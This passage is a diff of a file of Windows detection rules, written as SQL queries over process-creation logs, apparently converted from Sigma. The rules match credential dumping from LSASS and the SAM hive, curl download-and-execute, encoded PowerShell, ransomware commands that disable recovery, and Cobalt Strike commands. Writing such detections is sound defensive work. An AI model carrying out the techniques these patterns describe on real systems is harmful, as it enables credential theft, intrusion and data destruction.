CommandLine LIKE '%\\\\config\\\\RegBack\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\security%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_office.yml" + "filename": "proc_creation_win_esentutl_sensitive_file_copy.yml" }, { - "title": "HackTool - UACMe Akagi Execution", - "id": "d38d2fa4-98e6-4a24-aff1-410b0c9ad177", + "title": "Suspicious CustomShellHost Execution", + "id": "84b14121-9d14-416e-800b-f3b829c5a14d", "status": "experimental", - "description": "Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata", - "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detects the execution of CustomShellHost binary where the child isn't located in 'C:\\Windows\\explorer.exe'", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1216" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'UACMe' OR Company IN ('REvol Corp', 'APT 92', 'UG North', 'Hazardous Environments', 'CD Project Rekt') OR Description IN ('UACMe main module', 'Pentesting utility') OR OriginalFileName IN ('Akagi.exe', 'Akagi64.exe') OR (NewProcessName LIKE '%\\\\Akagi64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Akagi.exe' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\') OR Imphash IN ('767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\CustomShellHost.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_uacme.yml" + "filename": "proc_creation_win_lolbin_customshellhost.yml" }, { - "title": "WannaCry Ransomware Activity", - "id": "41d40bff-377a-43e2-8e1b-2e543069e079", - "status": "test", - "description": "Detects WannaCry ransomware activity", - "author": "Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro", + "title": "Renamed PsExec Service Execution", + "id": "51ae86a2-e2e1-4097-ad85-c46cb6851de4", + "status": "experimental", + "description": "Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1210", - "attack.discovery", - "attack.t1083", - "attack.defense_evasion", - "attack.t1222.001", - "attack.impact", - "attack.t1486", - "attack.t1490" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate administrative tasks" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\tasksche.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mssecsvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskdl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskhsvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskse.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\111.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lhdfrgui.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\linuxnew.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wannacry.exe' ESCAPE '\\') OR NewProcessName LIKE '%WanaDecryptor%' ESCAPE '\\' OR (CommandLine LIKE '%icacls%' ESCAPE '\\' AND CommandLine LIKE '%/grant%' ESCAPE '\\' AND CommandLine LIKE '%Everyone:F%' ESCAPE '\\' AND CommandLine LIKE '%/T%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\') OR (CommandLine LIKE '%bcdedit%' ESCAPE '\\' AND CommandLine LIKE '%/set%' ESCAPE '\\' AND CommandLine LIKE '%{default}%' ESCAPE '\\' AND CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\') OR (CommandLine LIKE '%wbadmin%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%-quiet%' ESCAPE '\\') OR CommandLine LIKE '%@Please\\_Read\\_Me@.txt%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'psexesvc.exe' AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_wannacry.yml" + "filename": "proc_creation_win_renamed_sysinternals_psexec_service.yml" }, { - "title": "Potential Manage-bde.wsf Abuse To Proxy Execution", - "id": "c363385c-f75d-4753-a108-c1a8e28bdbda", - "status": "test", - "description": "Detects potential abuse of the \"manage-bde.wsf\" script as a LOLBIN to proxy execution", - "author": "oscd.community, Natalia Shornikova, Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Dridex Activity", + "id": "e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e", + "status": "stable", + "description": "Detects potential Dridex acitvity via specific process patterns", + "author": "Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.privilege_escalation", + "attack.t1055", + "attack.discovery", + "attack.t1135", + "attack.t1033" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR OriginalFileName = 'wscript.exe') AND CommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') OR (((ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') AND NOT (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '% -s %' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.dll%' ESCAPE '\\'))) OR (ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' AND CommandLine LIKE '% /all%' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% view%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_lolbin_manage_bde.yml" + "filename": "proc_creation_win_malware_dridex.yml" }, { - "title": "Potential MSTSC Shadowing Activity", - "id": "6ba5a05f-b095-4f0a-8654-b825f4f16334", + "title": "Sysprep on AppData Folder", + "id": "d5b9ae7a-e6fc-405e-80ff-2ff9dcc64e7e", "status": "test", - "description": "Detects RDP session hijacking by using MSTSC shadowing", + "description": "Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1563.002" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "False positives depend on scripts and administrative tools used in the monitored environment" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%noconsentprompt%' ESCAPE '\\' AND CommandLine LIKE '%shadow:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sysprep.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_mstsc_rdp_hijack_shadowing.yml" + "filename": "proc_creation_win_sysprep_appdata.yml" }, { - "title": "HackTool - SharpUp PrivEsc Tool Execution", - "id": "c484e533-ee16-4a93-b6ac-f0ea4868b2f1", + "title": "Replace.exe Usage", + "id": "9292293b-8496-4715-9db6-37028dcda4b3", "status": "experimental", - "description": "Detects the use of SharpUp, a tool for local privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of Replace.exe which can be used to replace file with another file", + "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.t1615", - "attack.t1569.002", - "attack.t1574.005" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpUp.exe' ESCAPE '\\' OR Description = 'SharpUp' OR (CommandLine LIKE '%HijackablePaths%' ESCAPE '\\' OR CommandLine LIKE '%UnquotedServicePath%' ESCAPE '\\' OR CommandLine LIKE '%ProcessDLLHijack%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableServiceBinaries%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableScheduledTask%' ESCAPE '\\' OR CommandLine LIKE '%DomainGPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%CachedGPPPassword%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\replace.exe' ESCAPE '\\' AND (CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharpup.yml" + "filename": "proc_creation_win_lolbin_replace.yml" }, { - "title": "DarkSide Ransomware Pattern", - "id": "965fff6c-1d7e-4e25-91fd-cdccd75f7d2c", + "title": "Dotnet.exe Exec Dll and Execute Unsigned Code LOLBIN", + "id": "d80d5c81-04ba-45b4-84e4-92eba40e0ad3", "status": "test", - "description": "Detects DarkSide Ransomware and helpers", - "author": "Florian Roth (Nextron Systems)", + "description": "dotnet.exe will execute any DLL and execute unsigned code", + "author": "Beyu Denis, oscd.community", "tags": [ "attack.execution", - "attack.t1204" + "attack.t1218" ], "falsepositives": [ - "Unknown", - "UAC bypass method used by other malware" + "System administrator Usage" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%=[char][byte](''0x''+%' ESCAPE '\\' OR CommandLine LIKE '% -work worker0 -path %' ESCAPE '\\') OR (ParentCommandLine LIKE '%DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\dotnet.exe' ESCAPE '\\' OR OriginalFileName = '.NET Host') AND (CommandLine LIKE '%.dll' ESCAPE '\\' OR CommandLine LIKE '%.csproj' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_darkside_ransomware.yml" + "filename": "proc_creation_win_lolbin_dotnet.yml" }, { - "title": "Time Travel Debugging Utility Usage", - "id": "0b4ae027-2a2d-4b93-8c7e-962caaba5b2a", + "title": "RDP Connection Allowed Via Netsh.EXE", + "id": "01aeb693-138d-49d2-9403-c4f52d7d3d62", "status": "test", - "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "description": "Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware", + "author": "Sander Wiebing", "tags": [ "attack.defense_evasion", - "attack.credential_access", - "attack.t1218", - "attack.t1003.001" + "attack.t1562.004" ], "falsepositives": [ - "Legitimate usage by software developers/testers" + "Legitimate administration activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\tttracer.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%firewall %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%tcp %' ESCAPE '\\' AND CommandLine LIKE '%3389%' ESCAPE '\\') AND (CommandLine LIKE '%portopening%' ESCAPE '\\' OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%allow%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_tttracer_mod_load.yml" + "filename": "proc_creation_win_netsh_fw_allow_rdp.yml" }, { - "title": "Ilasm Lolbin Use Compile C-Sharp", - "id": "850d55f9-6eeb-4492-ad69-a72338f65ba4", - "status": "experimental", - "description": "Detect use of Ilasm.exe to compile c# code into dll or exe.", - "author": "frack113", + "title": "PowerShell Base64 Encoded Invoke Keyword", + "id": "6385697e-9f1b-40bd-8817-f4a91f40508e", + "status": "test", + "description": "Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls", + "author": "pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t", "tags": [ + "attack.execution", + "attack.t1059.001", "attack.defense_evasion", - "attack.t1127" + "attack.t1027" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ilasm.exe' ESCAPE '\\' OR OriginalFileName = 'ilasm.exe'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '% -e%' ESCAPE '\\' AND (CommandLine LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR CommandLine LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR CommandLine LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\' OR CommandLine LIKE '%SW52b2tlL%' ESCAPE '\\' OR CommandLine LIKE '%ludm9rZS%' ESCAPE '\\' OR CommandLine LIKE '%JbnZva2Ut%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_ilasm.yml" + "filename": "proc_creation_win_powershell_base64_invoke.yml" }, { - "title": "LSASS Memory Dumping", - "id": "ffa6861c-4461-4f59-8a41-578c39f3f23e", - "status": "test", - "description": "Detect creation of dump files containing the memory space of lsass.exe, which contains sensitive credentials.\nIdentifies usage of Sysinternals procdump.exe to export the memory space of lsass.exe which contains sensitive credentials.\n", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "title": "Service Started/Stopped Via Wmic.EXE", + "id": "0b7163dc-7eee-4960-af17-c0cd517f92da", + "status": "experimental", + "description": "Detects usage of wmic to start or stop a service", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution", + "attack.t1047" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%lsass%' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\werfault.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'wmic.exe' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '% service %' ESCAPE '\\' AND CommandLine LIKE '% call %' ESCAPE '\\' AND (CommandLine LIKE '%stopservice%' ESCAPE '\\' OR CommandLine LIKE '%startservice%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_lsass_dump.yml" + "filename": "proc_creation_win_wmic_service_manipulation.yml" }, { - "title": "Suspicious Diantz Download and Compress Into a CAB File", - "id": "185d7418-f250-42d0-b72e-0c8b70661e93", + "title": "Suspicious Execution From GUID Like Folder Names", + "id": "90b63c33-2b97-4631-a011-ceb0f47b77c3", "status": "experimental", - "description": "Download and compress a remote file and store it in a cab file on local machine.", - "author": "frack113", + "description": "Detects potential suspicious execution of a GUID like folder name located in a suspicious location such as %TEMP% as seen being used in IcedID attacks", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ - "Unknown" + "Installers are sometimes known for creating temporary folders with GUID like names. Add appropriate filters accordingly" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%diantz.exe%' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') AND CommandLine LIKE '%\\\\{%' ESCAPE '\\' AND CommandLine LIKE '%}\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\{%' ESCAPE '\\' AND NewProcessName LIKE '%}\\\\%' ESCAPE '\\') OR (NewProcessName = '') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\drvinst.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_diantz_remote_cab.yml" + "filename": "proc_creation_win_susp_execution_from_guid_folder_names.yml" }, { - "title": "DllUnregisterServer Function Call Via Msiexec.EXE", - "id": "84f52741-8834-4a8c-a413-2eb2269aa6c8", + "title": "Suspect Svchost Activity", + "id": "16c37b52-b141-42a5-a3ea-bbe098444397", "status": "experimental", - "description": "Detects MsiExec loading a DLL and calling its DllUnregisterServer function", - "author": "frack113", + "description": "It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.", + "author": "David Burkett, @signalblur", "tags": [ "attack.defense_evasion", - "attack.t1218.007" + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ - "Unknown" + "Rpcnet.exe / rpcnetp.exe which is a lojack style software. https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\msiexec.exe' ESCAPE '\\') AND (CommandLine LIKE '% /z %' ESCAPE '\\' OR CommandLine LIKE '% -z %' ESCAPE '\\') AND CommandLine LIKE '%.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rpcnetp.exe' ESCAPE '\\') OR CommandLine = ''))" ], - "filename": "proc_creation_win_msiexec_dll.yml" + "filename": "proc_creation_win_svchost_execution_with_no_cli_flags.yml" }, { - "title": "Weak or Abused Passwords In CLI", - "id": "91edcfb1-2529-4ac2-9ecc-7617f895c7e4", + "title": "HackTool - Certify Execution", + "id": "762f2482-ff21-4970-8939-0aa317a886bb", "status": "experimental", - "description": "Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI. An example would be a threat actor creating a new user via the net command and providing the password inline", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution" + "attack.discovery", + "attack.credential_access", + "attack.t1649" ], "falsepositives": [ - "Legitimate usage of the passwords by users via commandline (should be discouraged)", - "Other currently unknown false positives" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Asd123.aaaa%' ESCAPE '\\' OR CommandLine LIKE '%password123%' ESCAPE '\\' OR CommandLine LIKE '%123456789%' ESCAPE '\\' OR CommandLine LIKE '%P@ssw0rd!%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Certify.exe' ESCAPE '\\' OR OriginalFileName = 'Certify.exe' OR Description LIKE '%Certify%' ESCAPE '\\') OR ((CommandLine LIKE '%.exe cas %' ESCAPE '\\' OR CommandLine LIKE '%.exe find %' ESCAPE '\\' OR CommandLine LIKE '%.exe pkiobjects %' ESCAPE '\\' OR CommandLine LIKE '%.exe request %' ESCAPE '\\' OR CommandLine LIKE '%.exe download %' ESCAPE '\\') AND (CommandLine LIKE '% /vulnerable%' ESCAPE '\\' OR CommandLine LIKE '% /template:%' ESCAPE '\\' OR CommandLine LIKE '% /altname:%' ESCAPE '\\' OR CommandLine LIKE '% /domain:%' ESCAPE '\\' OR CommandLine LIKE '% /path:%' ESCAPE '\\' OR CommandLine LIKE '% /ca:%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_weak_or_abused_passwords.yml" + "filename": "proc_creation_win_hktl_certify.yml" }, { - "title": "Exploit for CVE-2015-1641", - "id": "7993792c-5ce2-4475-a3db-a3a5539827ef", - "status": "stable", - "description": "Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641", - "author": "Florian Roth (Nextron Systems)", + "title": "Curl Download And Execute Combination", + "id": "21dd6d38-2b18-4453-9404-a0fe4a0cc288", + "status": "test", + "description": "Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.", + "author": "Sreeman, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.005" + "attack.execution", + "attack.t1218", + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND NewProcessName LIKE '%\\\\MicroScMgmt.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '%curl %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%-o%' ESCAPE '\\' AND CommandLine LIKE '%&%' ESCAPE '\\')" ], - "filename": "proc_creation_win_exploit_cve_2015_1641.yml" + "filename": "proc_creation_win_cmd_curl_download_exec_combo.yml" }, { - "title": "Remote Access Tool - RURAT Execution From Unusual Location", - "id": "e01fa958-6893-41d4-ae03-182477c5e77d", + "title": "DLL Sideloading by VMware Xfer Utility", + "id": "ebea773c-a8f1-42ad-a856-00cb221966e8", "status": "experimental", - "description": "Detects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of 'C:\\Program Files')", + "description": "Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1574.002" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_dll_sideload_vmware_xfer.yml" + }, + { + "title": "Deleted Data Overwritten Via Cipher.EXE", + "id": "4b046706-5789-4673-b111-66f25fe99534", + "status": "experimental", + "description": "Detects usage of the \"cipher\" built-in utility in order to overwrite deleted data from disk.\nAdversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources.\nData destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives\n", + "author": "frack113", + "tags": [ + "attack.impact", + "attack.t1485" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rutserv.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rfusclient.exe' ESCAPE '\\') OR Product = 'Remote Utilities') AND NOT ((NewProcessName LIKE 'C:\\\\Program Files\\\\Remote Utilities%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Remote Utilities%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'CIPHER.EXE' OR NewProcessName LIKE '%\\\\cipher.exe' ESCAPE '\\') AND CommandLine LIKE '% /w:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_remote_access_tools_rurat_non_default_location.yml" + "filename": "proc_creation_win_cipher_overwrite_deleted_data.yml" }, { - "title": "Use of Wfc.exe", - "id": "49be8799-7b4d-4fda-ad23-cafbefdebbc5", + "title": "Operator Bloopers Cobalt Strike Commands", + "id": "647c7b9e-d784-4fda-b9a0-45c565a7b729", "status": "experimental", - "description": "The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules.", - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "description": "Detects use of Cobalt Strike commands accidentally entered in the CMD shell", + "author": "_pete_0, TheDFIRReport", "tags": [ - "attack.defense_evasion", - "attack.t1127" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Legitimate use by a software developer" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wfc.exe' ESCAPE '\\' OR OriginalFileName = 'wfc.exe'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Cmd.Exe' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND ((CommandLine LIKE 'cmd %' ESCAPE '\\' OR CommandLine LIKE 'cmd.exe%' ESCAPE '\\' OR CommandLine LIKE 'c:\\\\windows\\\\system32\\\\cmd.exe%' ESCAPE '\\') AND (CommandLine LIKE '%psinject%' ESCAPE '\\' OR CommandLine LIKE '%spawnas%' ESCAPE '\\' OR CommandLine LIKE '%make\\_token%' ESCAPE '\\' OR CommandLine LIKE '%remote-exec%' ESCAPE '\\' OR CommandLine LIKE '%rev2self%' ESCAPE '\\' OR CommandLine LIKE '%dcsync%' ESCAPE '\\' OR CommandLine LIKE '%logonpasswords%' ESCAPE '\\' OR CommandLine LIKE '%execute-assembly%' 